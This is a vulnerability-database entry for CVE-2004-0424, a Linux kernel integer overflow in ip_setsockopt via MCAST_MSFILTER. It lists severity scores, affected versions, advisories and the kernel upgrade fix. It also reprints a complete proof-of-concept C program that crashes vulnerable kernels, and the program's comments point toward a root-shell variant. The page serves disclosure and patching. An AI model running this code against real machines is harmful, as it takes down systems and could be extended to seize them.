CVE-2004-0424
CVSS7.2
发布时间 :2004-07-07 00:00:00
修订时间 :2016-10-17 22:45:17
NMCOES    

[原文]Integer overflow in the ip_setsockopt function in Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 allows local users to cause a denial of service (crash) or execute arbitrary code via the MCAST_MSFILTER socket option.


[CNNVD]Linux Kernel Setsockopt MCAST_MSFILTER整数溢出漏洞(CNNVD-200407-013)

        Linux kernel 2.4.22到2.4.25 和2.6.1到2.6.3版本的ip_setsockopt函数存在整数溢出漏洞。本地用户借助MCAST_MSFILTER接口选项导致服务拒绝(崩溃)或者执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:slackware:slackware_linux:9.1Slackware Linux 9.1
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.4.25Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.4.24Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.6.3Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.6.2Linux Kernel 2.6.2
cpe:/a:sgi:propack:3.0SGI ProPack 3.0
cpe:/o:linux:linux_kernel:2.6.1Linux Kernel 2.6.1
cpe:/o:slackware:slackware_linux:current
cpe:/o:linux:linux_kernel:2.4.23:pre9Linux Kernel 2.4.23 pre9

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:939Linux Kernel ip_setsockopt Integer Overflow
oval:org.mitre.oval:def:11214Integer overflow in the ip_setsockopt function in Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 allows local users to cause a d...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0424
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0424
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-013
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20040504-01-U.asc
(UNKNOWN)  SGI  20040504-01-U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000852
(UNKNOWN)  CONECTIVA  CLA-2004:852
http://marc.info/?l=bugtraq&m=108253171301153&w=2
(UNKNOWN)  BUGTRAQ  20040420 Linux kernel setsockopt MCAST_MSFILTER integer overflow
http://www.isec.pl/vulnerabilities/isec-0015-msfilter.txt
(VENDOR_ADVISORY)  MISC  http://www.isec.pl/vulnerabilities/isec-0015-msfilter.txt
http://www.linuxsecurity.com/advisories/engarde_advisory-4285.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20040428-004
http://www.mandriva.com/security/advisories?name=MDKSA-2004:037
(UNKNOWN)  MANDRAKE  MDKSA-2004:037
http://www.novell.com/linux/security/advisories/2004_10_kernel.html
(UNKNOWN)  SUSE  SuSE-SA:2004:010
http://www.redhat.com/support/errata/RHSA-2004-183.html
(UNKNOWN)  REDHAT  RHSA-2004:183
http://www.securityfocus.com/bid/10179
(VENDOR_ADVISORY)  BID  10179
http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.659586
(UNKNOWN)  SLACKWARE  SSA:2004-119
http://xforce.iss.net/xforce/xfdb/15907
(VENDOR_ADVISORY)  XF  linux-ipsetsockopt-integer-bo(15907)

- 漏洞信息

Linux Kernel Setsockopt MCAST_MSFILTER整数溢出漏洞
高危 缓冲区溢出
2004-07-07 00:00:00 2005-10-20 00:00:00
本地  
        Linux kernel 2.4.22到2.4.25 和2.6.1到2.6.3版本的ip_setsockopt函数存在整数溢出漏洞。本地用户借助MCAST_MSFILTER接口选项导致服务拒绝(崩溃)或者执行任意代码。

- 公告与补丁

        This issue has been addressed in the 2.4.26 and 2.6.4 kernel releases. Please see the references for more information.
        Linux kernel 2.4.22
        

- 漏洞信息 (274)

Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit (EDBID:274)
linux dos
2004-04-21 Verified
0 Julien Tinnes
N/A [点击下载]
/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
vulnerability found (as always by Paul Starzetz

This is only a lame POC which will crash the machine, no root shell here.
Maybe later, when everybody will have an updated box.

It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.

Greets to Christophe Devine, too bad you wasn't with me for this one.

*/


#include <errno.h>
void perror (const char *s);

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/socket.h>

#define SOL_IP 0
#define MCAST_MSFILTER 48

/* mynumsrc and alloc_room control the overflow
* what we write can be controlled too (not needed
* here but needed for rootshell exploit
*/

#define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */
#define alloc_room 1 /* let it alocate only one u32 */

struct mygroup_filter
{
__u32 gf_interface; /* interface index */
struct sockaddr_storage gf_group; /* multicast address */
__u32 gf_fmode; /* filter mode */
__u32 gf_numsrc; /* number of sources */
struct sockaddr_storage gf_slist[mynumsrc]; /* interface index */
};


void
main (void)
{

int mysocket;
int sockprot;
struct mygroup_filter mygroup;
int optlen;
int i;
struct sockaddr_in *psin;

mygroup.gf_interface = 0;
mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;

mygroup.gf_group.ss_family = AF_INET;



for (i = 0; i < mynumsrc; i++)
{
psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
psin->sin_family = AF_INET;
}


mysocket = socket (PF_INET, SOCK_STREAM, 0);

if (mysocket == -1)
{
perror ("Socket creation error: ");
exit (1);
}

optlen = sizeof (struct mygroup_filter);

printf ("Calling setsockopt(), this should crash the box...\n");
sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen);

if (sockprot == -1)
{
perror ("Invalid setsockopt: ");
exit (1);
}
}




// milw0rm.com [2004-04-21]
		

- 漏洞信息

5547
Linux Kernel ip_setsockopt MCAST_MSFILTER macro Overflow
Local Access Required Input Manipulation, Race Condition
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Linux kernel contains a flaw that may allow a local denial of service. The issue is triggered when handling the MCAST_MSFILTER socket option of the ip_setsockopt() in the net/ipv4/i_sockglue.c source file. This flaw may allow a local attacker to cause a interger overflow and crash server or execute arbitrary codes, result in loss of availability.

- 时间线

2004-04-20 Unknow
2004-04-20 Unknow

- 解决方案

Upgrade to version 2.4.26 or 2.6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux Kernel Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability
Boundary Condition Error 10179
No Yes
2004-04-20 12:00:00 2007-05-25 11:21:00
Paul Starzetz is credited with initial discovery and Wojciech Purczynski is credited with followup research.

- 受影响的程序版本

Slackware Linux 9.1
Slackware Linux -current
SGI ProPack 3.0
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.4.25
Linux kernel 2.4.24 -ow1
Linux kernel 2.4.24
Linux kernel 2.4.23 -pre9
Linux kernel 2.4.23 -ow2
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.4.26

- 不受影响的程序版本

Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.4.26

- 漏洞讨论

An integer-overflow vulnerability has been reported in the 'setsockopt()' system call. This was introduced as of the 2.4.22/2.6.1 kernel releases.

The specific issue resides in the 'net/ipv4/ip_sockglue.c' source file and is present in the 'ip_setsockopt()' subroutine of the 'setsockopt()' system call. Within this subroutine, an integer overflow occurs within the IP_MSFILTER_SIZE macro, which is used when setting the MCAST_MSFILTER socket option.

A local attacker may exploit this issue to compromise the system or cause a denial of service. Note that this type of vulnerability may provide a generic means of privilege escalation across Linux distributions after a remote attacker has gained unauthorized access as a lower-privileged user.

- 漏洞利用

A working exploit has been developed by one of the individuals who researched this vulnerability. This exploit is not publicly available or known to be circulating in the wild.

The following proof-of-concept and exploit codes are avaialble:

- 解决方案

This issue has been addressed in the 2.4.26 and 2.6.4 kernel releases. Please see the references for more information.


Linux kernel 2.4.22

Linux kernel 2.4.23 -pre9

Linux kernel 2.4.23 -ow2

Linux kernel 2.4.23

Linux kernel 2.4.24 -ow1

Linux kernel 2.4.24

Linux kernel 2.4.25

Linux kernel 2.6.1 -rc2

Linux kernel 2.6.1 -rc1

Linux kernel 2.6.2

Linux kernel 2.6.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站